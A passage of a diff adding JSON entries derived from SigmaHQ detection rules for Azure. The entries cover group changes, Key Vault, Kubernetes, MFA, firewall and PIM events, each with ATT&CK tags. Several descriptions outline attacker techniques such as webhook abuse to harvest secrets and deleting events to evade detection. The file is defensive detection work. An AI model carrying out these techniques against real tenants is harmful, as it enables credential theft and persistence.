"creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_addition_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", + "value": "User Added To Group With CA Policy Modification Access" + }, + { + "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_removal_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", + "value": "User Removed From Group With CA Policy Modification Access" + }, + { + "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "A non malicious user is unaware of the proper process" + ], + "filename": "azure_guest_invite_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", + "value": "Guest User Invited By Non Approved Inviters" + }, + { + "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_guest_to_member.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", + "value": "User State Changed From Guest To Member" + }, + { + "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_keyvault_key_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "80eeab92-0979-4152-942d-96749e11df40", + "value": "Azure Keyvault Key Modified or Deleted" + }, + { + "description": "Identifies when a key vault is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key Vault being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_keyvault_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", + "value": "Azure Key Vault Modified or Deleted" + }, + { + "description": "Identifies when secrets are modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_keyvault_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", + "value": "Azure Keyvault Secrets Modified or Deleted" + }, + { + "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Azure Kubernetes Admissions Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", + "value": "Azure Kubernetes Admission Controller" + }, + { + "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", + "value": "Azure Kubernetes Cluster Created or Deleted" + }, + { + "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Azure Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", + "value": "Azure Kubernetes CronJob" + }, + { + "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_events_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.t1562.001" + ] + }, + "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", + "value": "Azure Kubernetes Events Deleted" + }, + { + "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_network_policy_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", + "value": "Azure Kubernetes Network Policy Change" + }, + { + "description": "Identifies the deletion of Azure Kubernetes Pods.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_pods_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", + "value": "Azure Kubernetes Pods Deleted" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", + "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" + }, + { + "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ],
+ "filename": "azure_kubernetes_role_access.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887",
+ "value": "Azure Kubernetes Sensitive Role Access"
+ },
+ {
+ "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/07",
+ "falsepositive": [
+ "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_kubernetes_secret_or_config_object_access.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c",
+ "value": "Azure Kubernetes Secret or Config Object Access"
+ },
+ {
+ "description": "Identifies when a service account is modified or deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/07",
+ "falsepositive": [
+ "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_kubernetes_service_account_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2",
+ "value": "Azure Kubernetes Service Account Modified or Deleted"
+ },
+ {
+ "description": "Alert on when legecy authentication has been used on an account",
+ "meta": {
+ "author": "Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/06/17",
+ "falsepositive": [
+ "User has been put in acception group so they can use legacy authentication"
+ ],
+ "filename": "azure_legacy_authentication_protocols.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1212"
+ ]
+ },
+ "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e",
+ "value": "Use of Legacy Authentication Protocols"
+ },
+ {
+ "description": "Detect failed attempts to sign in to disabled accounts.",
+ "meta": {
+ "author": "AlertIQ",
+ "creation_date": "2021/10/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "azure_login_to_disabled_account.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8",
+ "value": "Login to Disabled Account"
+ },
+ {
+ "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.",
+ "meta": {
+ "author": "AlertIQ",
+ "creation_date": "2022/03/24",
+ "falsepositive": [
+ "Users actually login but miss-click into the Deny button when MFA prompt."
+ ],
+ "filename": "azure_mfa_denies.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078.004"
+ ]
+ },
+ "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99",
+ "value": "Multifactor Authentication Denied"
+ },
+ {
+ "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.",
+ "meta": {
+ "author": "@ionsor",
+ "creation_date": "2022/02/08",
+ "falsepositive": [
+ "Authorized modification by administrators"
+ ],
+ "filename": "azure_mfa_disabled.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1556/",
+ "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1556"
+ ]
+ },
+ "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf",
+ "value": "Disabled MFA to Bypass Authentication Mechanisms"
+ },
+ {
+ "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.",
+ "meta": {
+ "author": "AlertIQ",
+ "creation_date": "2021/10/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "azure_mfa_interrupted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078.004"
+ ]
+ },
+ "uuid": "5496ff55-42ec-4369-81cb-00f417029e25",
+ "value": "Multifactor Authentication Interrupted"
+ },
+ {
+ "description": "Identifies when a Firewall Policy is Modified or Deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/09/02",
+ "falsepositive": [
+ "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_network_firewall_policy_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23",
+ "value": "Azure Network Firewall Policy Modified or Deleted"
+ },
+ {
+ "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/08",
+ "falsepositive": [
+ "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_network_firewall_rule_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067",
+ "value": "Azure Firewall Rule Configuration Modified or Deleted"
+ },
+ {
+ "description": "Identifies when a Point-to-site VPN is Modified or Deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/08",
+ "falsepositive": [
+ "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_network_p2s_vpn_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792",
+ "value": "Azure Point-to-site VPN Modified or Deleted"
+ },
+ {
+ "description": "Identifies when a network security configuration is modified or deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/08",
+ "falsepositive": [
+ "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_network_security_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df",
+ "value": "Azure Network Security Configuration Modified or Deleted"
+ },
+ {
+ "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/08",
+ "falsepositive": [
+ "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_network_virtual_device_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3",
+ "value": "Azure Virtual Network Device Modified or Deleted"
+ },
+ {
+ "description": "Identifies when a new cloudshell is created inside of Azure portal.",
+ "meta": {
+ "author": "Austin Songer",
+ "creation_date": "2021/09/21",
+ "falsepositive": [
+ "A new cloudshell may be created by a system administrator."
+ ],
+ "filename": "azure_new_cloudshell_created.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb",
+ "value": "Azure New CloudShell Created"
+ },
+ {
+ "description": "Identifies when a owner is was removed from a application or service principal in Azure.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/09/03",
+ "falsepositive": [
+ "Owner being removed may be performed by a system administrator.",
+ "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_owner_removed_from_application_or_service_principal.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6",
+ "value": "Azure Owner Removed From Application or Service Principal"
+ },
+ {
+ "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/08/09",
+ "falsepositive": [
+ "Actual admin using PIM."
+ ],
+ "filename": "azure_pim_activation_approve_deny.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d",
+ "value": "PIM Approvals And Deny Elevation"
+ },
+ {
+ "description": "Detects when PIM alerts are set to disabled.",
+ "meta": {
